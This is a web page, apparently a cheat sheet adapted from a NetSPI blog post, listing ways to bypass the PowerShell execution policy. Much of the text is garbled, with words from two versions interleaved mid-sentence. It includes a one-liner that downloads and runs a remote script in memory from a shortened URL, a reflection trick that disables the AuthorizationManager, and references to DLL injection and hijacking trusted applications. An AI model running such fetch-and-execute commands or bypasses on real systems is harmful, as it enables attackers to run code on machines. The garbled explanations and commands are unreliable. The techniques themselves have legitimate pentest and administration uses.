Bypass the PowerShell Execution Policy
đź’» 15 Ways to Bypass the PowerShell Execution Policy
🔎 What is the PowerShell Execution Policy?
PowerShell’sThe execution policy restrictsdetermines scriptwhat type of PowerShell scripts (if any) can run. By default, it's set to Restricted, which blocks all scripts. It's meant to prevent accidental execution, butnot theseas methodsa allowtrue yousecurity control — which is why it’s easy to bypassbypass.
đź’ˇ withoutWhy needingBypass adminIt?
- PowerShell is native to Windows
- Can interact with the Windows API
- Can run in memory (no disk writes)
- Often trusted by whitelisting tools
- Used in many open-source pentest frameworks
🔍 View Current Execution Policy
Get-ExecutionPolicy
Get-ExecutionPolicy -List | Format-Table -AutoSize🧪 QuickTest MethodsScript withExample
Write-Host "My voice is my passport, verify me."---
🚪 15 Ways to Bypass Execution Policy
- Paste
directlyin Interactive Console
Directly run the script inthePowerShell.consolePoliciesNodon’tconfigapplychangestoormanuallyfiletyped commands.writes. - Echo
& pipeto PowerShell
echo Write-Host "Hi"My\voice is my passport" | powershell -noprofile -Executesvia stdin. - Pipe
aFilescriptviafileType/Get-Content
Get-Contentscript..\runme.ps1\| powershell -noprofile -Readsline-by-linetypeas.\runme.ps1input.| powershell -noprofile - - Download
and+execute in memoryInvoke-Expression
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('URL'https://bit.ly/1kEgbuH')"Nofile written to disk. - Use -Command
argumentSwitch
powershell -command "Write-Host 'Bypass'Hello'"Executesinline commands. - Use -EncodedCommand
Then run with:$cmd = "Write-Host 'Hello'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($cmd) [Convert]::ToBase64String($bytes)powershell -EncodedCommandargument<base64> - Invoke-Command
Invoke-Command -ScriptBlock {Write-Host "Hello"}Base64-encodedCanstringalsopassedpulldirectlypolicytofromPowerShell.a remote host:
Invoke-Command -ComputerName server -ScriptBlock {Get-ExecutionPolicy} | Set-ExecutionPolicy -Force - Invoke-Expression (iex)
orGet-Content .\runme.ps1 | Invoke-Expression
gc .\runme.ps1 | iex - Use -ExecutionPolicy Bypass
powershell -ExecutionPolicy Bypass -File .\runme.ps1 - Use -ExecutionPolicy Unrestricted
powershell -ExecutionPolicy UnRestricted -File .\runme.ps1 - Use -ExecutionPolicy RemoteSigned
powershell -ExecutionPolicy RemoteSigned -File .\runme.ps1 - Swap AuthorizationManager (Temporary)
function Disable-ExecutionPolicy { ($ctx = $executioncontext.gettype().getfield("_context","nonpublic,instance").getvalue( $executioncontext)).gettype().getfield("_authorizationManager","nonpublic,instance").setvalue( $ctx, (New-Object System.Management.Automation.AuthorizationManager "Microsoft.PowerShell")) } Disable-ExecutionPolicy - Set
executionPolicypolicyforin sessionProcess
OnlySet-ExecutionPolicy Bypass -Scope Processaffectsforcurrentthis session. UseSetPowerShellPolicyISEfor Current User
powershell_ise.exeSet-ExecutionPolicyscript.ps1-Scope CurrentUser -ExecutionPolicy UnRestrictedSometimesbypasses policy.RenameEditscriptRegistrytofor.txtCurrent UserReadandModify:
runHKEY_CURRENT_USER\Software\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell
manually;Add/modify
avoidsstring.ps1valueenforcement.WMI=executionRunsUnrestrictedScheduled taskCreate task to run your script.PowerShell remotingExecutes on remote systems; local policy may not apply.Inject via DLL (advanced)Loads PowerShell engine directly in memory.Invoke from MSHTA or wscriptUses alternate script hosts to trigger PowerShell.Use trusted software to executeHijack or abuse applications that run PowerShell under the hood.
ExecutionPolicy
---
âś… Wrap Up
Note:PowerShell’s Theseexecution methodspolicy areis a soft restriction — not a security boundary. Microsoft even provides native ways to bypass it. Use these techniques for legitimate use only — such as automation, testing, and redadministration.
Adapted from NetSPI — whereoriginal authorized.blog post